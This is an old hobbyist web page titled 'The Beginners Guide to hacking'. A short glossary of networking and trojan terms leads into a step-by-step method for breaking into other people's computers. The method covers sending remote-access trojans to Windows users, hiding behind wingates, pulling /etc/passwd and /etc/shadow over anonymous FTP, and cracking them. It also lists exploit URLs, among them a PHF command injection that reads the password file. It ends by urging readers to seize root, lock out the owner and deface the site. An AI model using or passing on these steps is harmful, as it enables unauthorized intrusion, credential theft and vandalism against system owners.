The Beginners Guide to hacking
by NPN of Undernet' s #hackuk
The owner of this website can accept no responsibility for the problems that you cause with the information on this page. This site simply exists to bring people who are willing to learn, into the world of security. (NPN)
The first section on this page describes basic internet knowledge and terms.
IP address: An IP address is a unique numeric address in 4 parts, which each computer on the internet is given on connection, when off the internet, your IP address is set to 127.0.0.1 unless otherwise specified. IP stands for Internet Protocol
TCP/IP: TCP/IP stands for Transmission Control Protocol / Internet Protocol, and is the most widely used connection type.
IPX/SPX: This is a LAN protocol (Local Area Network) and is used in the communication of networks.
BO: This stands for Back Orifice, a windows remote access trojan.
OS: Operating system
UNIX: This is a type of Operating System
Netbus: Another remote access trojan, rather like Back Orifice
Trojan: A virus disguised in as something else to get the user to run it.
Java: A programming language used mainly on websites
TcL: Another programming language
ASCII: American Standard Code Information Interchange. These are the basic set of characters. There are 255 in total
ASM: Assembler, another programming language
C: Another programming language
DOS: Disk Operating System, An Operating System
*NIX: Any UNIX based OS
Port: A port, is the interface from which two computers connect on. Lets say, you decided to go and look at a website, by default you would be connecting to the remote computer on Port 80 which will be listening for connections, in order to view the data. Other ports include 21 (ftp) 23 (telnet) and 110 (POP3) Some common ports.
DoS: Denial of Service, this is an irritating tool, that kids use, it takes advantage of holes in an OS (mainly windows) to crash it, flood it, or reboot it. One of these dos attacks works by sending OOB data on port 113 to a windows computer. Windows DoS attacks include Winnuke, Click Nuke, Panther, and Genocide. *NIX DoS attacks include Boink, SSPing, Ping of Death and Teardrop.
OOB: Out of Bound Data (see DoS)
Wingating: Wingating is the art of going through an openly accessible computer known as a wingate, in order to connect to any number of things. (Through the wingate.)
That should be enough to get started. Now, on to hacking. The easiest, and best way to begin, is by using a Trojan. These will allow you to gain access to any windows computer, that will accept the file that you send them. You can then control files, open/close the CD-ROM drive, etc...
You may download the following:
Now, onto *NIX hacking. First, you must download a few programs. A Service Scanner, a resolve program, a telnet program, a web browser and an FTP program.
Next, you must "Service Scan" your target. This will scan your target for common open ports, such as http (80) ftp (21) telnet (23).
1. If the results show that port 23 is open, do the following. Connect to a wingate. When you receive a "Wingate>" prompt, type in the IP address of the person you want to connect to, followed by :23. If the address is in words, such as chariott.com you must resolve it, to an IP address. Then connect as described above.
2. When you have connected, it should ask you for a username and password. First of all, try anonymous username and make up a password. Then try anon as a username. If this fails, close your telnet program and continue to stage 4. Otherwise, first try to set up an ftp connection by typing ftp. and try downloading the /etc/passwd and /etc/shadow files, if this fails, try using an exploit. Some of these are here Sendmail, Pine and Hamors
3. Open your FTP program, and type in the address of your target. If it asks for a port anywhere, type 21. In the username box try anonymous and anon again. If this fails, give up on this stage, and continue to stage 4. Otherwise, change the current dir to /etc and try to download the files passwd and shadow. Once you have done these, crack the password using a UNIX password file cracker such as John the Ripper. Once you have cracked the passwords, return to stage 2, and use these passwords, (if you crack root password, you have struck gold, and now own the system.)
4. OK, no luck yet, don't despair, now for some fun with the http (80) port. This can all be done from your web browser. Open your web browser, and try typing the following things until you get a result. (Where it says address, type in the place you want to hack, either the IP address or the host address.) Do NOT include the . after the http: that I have included.
http:.//address.com/..\..
http:.//www.address.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd (This is known as the PHF technique).
http:.//www.address.com/cgi-bin/php.cgi
http:.//www.address.com/cgi-bin/finger
http:.//www.address.com/cgi-bin/test-cgi
http:.//www.address.com/_vti_pvt/service.pwd
http:.//www.address.com/cgi-bin/aglimpse
http:.//www.address.com/cgi-bin/phf
http:.//www.address.com/_vti_pvt/
http:.//www.address.com/iisadmin
http:.//www.address.com/scripts/samples/search/queryhit.idq
Some useful *nix commands:
rm --erase
dir --dir
ls --list
cp --copy
mv --move
mount --mount
pico --text editor
Links:
http://www.strange-days.demon.co.uk
Enough on techniques, lets say that you managed to find out the root password. The first thing the beginner should do, is login as root with the password that you found out, and then type passwd, change the root password, and you should hold out for a bit, you now control what is probably a permenant connection, and a lot of space, change the website, make it known that you did it, go to undernet' s #hackuk, and best of all set up an eggdrop :-)
~~N-P-N~~
Negative-Positive-Negative
Undernet' s #hackuk
Mail me: [email protected]
This Merchant Taylors' School Webring site is owned by Adam Palmer. [ Previous 5 | Previous | Next | Next 5 ] |